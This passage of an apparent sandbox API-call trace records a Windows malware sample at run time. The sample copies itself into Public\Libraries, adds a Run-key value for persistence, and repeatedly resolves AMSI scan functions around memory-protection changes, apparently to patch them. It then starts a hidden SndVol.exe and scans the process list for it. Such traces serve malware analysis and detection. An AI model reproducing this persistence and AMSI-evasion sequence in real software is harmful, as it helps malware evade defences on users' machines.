flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0136.667] GetCurrentProcess () returned 0xffffffff [0136.667] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0136.667] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0136.668] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0136.668] GetFileAttributesA (lpFileName="C:\\Users\\Public\\Libraries" (normalized: "c:\\users\\public\\libraries")) returned 0x13 [0136.670] GetFileAttributesA (lpFileName="C:\\Users\\Public\\Libraries\\ocecdT.url" (normalized: "c:\\users\\public\\libraries\\ocecdt.url")) returned 0xffffffff [0136.670] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x416f664, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe")) returned 0x62 [0136.670] CopyFileA (lpExistingFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe"), lpNewFileName="C:\\Users\\Public\\Libraries\\Tdceco.exe" (normalized: "c:\\users\\public\\libraries\\tdceco.exe"), bFailIfExists=1) returned 1 [0138.406] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0138.407] GetModuleHandleA (lpModuleName="kernel32") returned 0x76720000 [0138.407] GetProcAddress (hModule=0x76720000, lpProcName="CopyFileA") returned 0x7673f780 [0138.407] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0138.409] GetCurrentProcess () returned 0xffffffff [0138.409] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0138.409] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0138.410] FreeLibrary (hLibModule=0x767200ff) returned 0 [0138.419] CreateFileA (lpFileName="C:\\Users\\Public\\Libraries\\ocecdT.url" (normalized: "c:\\users\\public\\libraries\\ocecdt.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c4 [0138.420] WriteFile (in: hFile=0x5c4, lpBuffer=0x4dc8468*, nNumberOfBytesToWrite=0x62, lpNumberOfBytesWritten=0x416f714, lpOverlapped=0x0 | out: lpBuffer=0x4dc8468*, lpNumberOfBytesWritten=0x416f714*=0x62, lpOverlapped=0x0) returned 1 [0138.421] CloseHandle (hObject=0x5c4) returned 1 [0138.425] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", phkResult=0x416f76c | out: phkResult=0x416f76c*=0x5c4) returned 0x0 [0138.425] RegSetValueExA (in: hKey=0x5c4, lpValueName="Tdceco", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\Public\\Libraries\\ocecdT.url", cbData=0x24 | out: lpData="C:\\Users\\Public\\Libraries\\ocecdT.url") returned 0x0 [0138.427] RegCloseKey (hKey=0x5c4) returned 0x0 [0138.427] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0138.427] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0138.428] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0138.428] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0138.430] GetCurrentProcess () returned 0xffffffff [0138.430] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0138.430] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0138.431] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0138.431] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0138.431] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0138.432] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanString") returned 0x6f8740e0 [0138.432] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0138.434] GetCurrentProcess () returned 0xffffffff [0138.434] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0138.434] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0138.434] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0138.445] VirtualAlloc (lpAddress=0x0, dwSize=0x140000, flAllocationType=0x1000, flProtect=0x4) returned 0x4fe0000 [0138.509] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0138.509] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0138.509] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0138.510] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0138.605] GetCurrentProcess () returned 0xffffffff [0138.605] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0138.605] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0138.651] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0138.651] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0138.652] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0138.652] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanString") returned 0x6f8740e0 [0138.652] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0138.664] GetCurrentProcess () returned 0xffffffff [0138.664] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0138.664] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0138.664] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0138.665] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0138.665] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0138.666] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0138.666] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0138.669] GetCurrentProcess () returned 0xffffffff [0138.669] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0138.669] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0138.670] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0138.670] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0138.670] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0138.671] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0138.671] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0138.674] GetCurrentProcess () returned 0xffffffff [0138.674] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0138.674] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0138.674] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0138.679] VirtualAlloc (lpAddress=0x50480000, dwSize=0x2f000, flAllocationType=0x3000, flProtect=0x40) returned 0x50480000 [0138.733] ShellExecuteA (hwnd=0x769bf2ba, lpOperation="open", lpFile="SndVol.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=0) returned 0x2a [0142.046] Sleep (dwMilliseconds=0x3e8) [0143.059] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76720000 [0143.060] GetProcAddress (hModule=0x76720000, lpProcName="CreateToolhelp32Snapshot") returned 0x76747b50 [0143.060] GetProcAddress (hModule=0x76720000, lpProcName="Heap32ListFirst") returned 0x76764120 [0143.060] GetProcAddress (hModule=0x76720000, lpProcName="Heap32ListNext") returned 0x767641d0 [0143.061] GetProcAddress (hModule=0x76720000, lpProcName="Heap32First") returned 0x76763f00 [0143.061] GetProcAddress (hModule=0x76720000, lpProcName="Heap32Next") returned 0x76764270 [0143.062] GetProcAddress (hModule=0x76720000, lpProcName="Toolhelp32ReadProcessMemory") returned 0x76764820 [0143.062] GetProcAddress (hModule=0x76720000, lpProcName="Process32First") returned 0x7673f4d0 [0143.062] GetProcAddress (hModule=0x76720000, lpProcName="Process32Next") returned 0x7673d1c0 [0143.063] GetProcAddress (hModule=0x76720000, lpProcName="Process32FirstW") returned 0x7673f5a0 [0143.064] GetProcAddress (hModule=0x76720000, lpProcName="Process32NextW") returned 0x7673d290 [0143.064] GetProcAddress (hModule=0x76720000, lpProcName="Thread32First") returned 0x76745c50 [0143.065] GetProcAddress (hModule=0x76720000, lpProcName="Thread32Next") returned 0x76745150 [0143.065] GetProcAddress (hModule=0x76720000, lpProcName="Module32First") returned 0x767644b0 [0143.066] GetProcAddress (hModule=0x76720000, lpProcName="Module32Next") returned 0x76764660 [0143.066] GetProcAddress (hModule=0x76720000, lpProcName="Module32FirstW") returned 0x767645a0 [0143.067] GetProcAddress (hModule=0x76720000, lpProcName="Module32NextW") returned 0x76764740 [0143.067] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x650 [0143.086] Process32First (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.088] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="[System Process]", cchCount1=16, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.088] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x78, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0143.089] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="System", cchCount1=6, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.089] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0143.090] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="smss.exe", cchCount1=8, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.090] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0143.092] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="csrss.exe", cchCount1=9, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.092] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0143.093] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="wininit.exe", cchCount1=11, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.094] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0143.095] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="csrss.exe", cchCount1=9, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.095] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0143.096] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="winlogon.exe", cchCount1=12, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.096] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0143.097] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="services.exe", cchCount1=12, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.098] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0143.099] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="lsass.exe", cchCount1=9, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.099] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.100] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.100] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.102] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.102] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0143.104] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="dwm.exe", cchCount1=7, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.104] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.105] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.105] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.107] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.107] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.108] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.108] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.109] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.109] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.110] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.110] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.112] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.112] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.114] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.114] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0143.115] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="spoolsv.exe", cchCount1=11, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.115] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0143.117] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="sihost.exe", cchCount1=10, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.117] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0143.118] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="RuntimeBroker.exe", cchCount1=17, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.118] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.120] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.120] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0143.121] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="explorer.exe", cchCount1=12, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.121] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0143.122] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="taskhostw.exe", cchCount1=13, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.122] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0143.124] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="ShellExperienceHost.exe", cchCount1=23, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.124] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0143.125] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="SearchUI.exe", cchCount1=12, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.125] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.127] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.127] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0143.128] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="sppsvc.exe", cchCount1=10, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.129] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x404, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0143.130] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="WMIADAP.exe", cchCount1=11, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.130] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0143.131] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="WmiPrvSE.exe", cchCount1=12, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.131] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0143.133] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="iexplore.exe", cchCount1=12, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.133] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x774, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0143.134] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="iexplore.exe", cchCount1=12, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.134] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="start.exe")) returned 1 [0143.135] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="start.exe", cchCount1=9, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.135] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kind.exe")) returned 1 [0143.136] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="kind.exe", cchCount1=8, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.136] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="eight.exe")) returned 1 [0143.137] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="eight.exe", cchCount1=9, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.137] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, 